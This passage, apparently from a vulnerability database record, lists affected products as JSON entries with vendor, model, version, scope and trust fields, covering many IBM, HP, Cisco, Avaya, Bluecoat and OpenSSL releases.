"scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "workflow for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5750" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79550" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1.11" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.2.2.2" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "policycenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.2" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37001.1" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "power system s814", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.21" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.3" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.40" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.b1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.12" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087380" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.e0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.21" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "alienvault", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.15.1" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "project openssl 1.0.1k", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50001.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "es1500", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "power systems 350.e1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ctpview", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.00" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.13" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.8" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12" }, { "model": "system management homepage c", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079450" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.4(7.26)" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8.0.10" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "aura communication manager ssp04", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.2" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "power systems 350.a0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "systems insight manager sp5", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.3" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(5.106)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.3" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.1.8" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.8" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22079060" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88042590" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.2" }, { "model": "one-x client enablement services sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.00" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.02" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.22" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "application policy infrastructure controller 1.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "norman shark scada protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "820.03" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205577" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "10g vfsm for bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571451.43" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365042550" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571910" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0-103" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.16" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.1.3.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.81" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-95" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.8" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.00" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "ace30 application control engine module 3.0 a5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 12.3r10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.3" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.8" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571480" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.6" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.7" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.6" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.50" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "firesight system software", "scope": "eq", 